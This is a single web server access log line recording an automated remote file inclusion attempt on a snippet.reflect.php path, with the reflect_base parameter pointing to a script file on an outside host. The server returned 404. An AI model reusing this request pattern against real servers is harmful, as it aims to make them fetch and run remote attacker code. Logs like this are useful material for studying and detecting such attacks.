193.201.52.117 - - [08/Dec/2008:10:08:16 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.gupyong.es.kr/zboard//skin/buzzard1/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
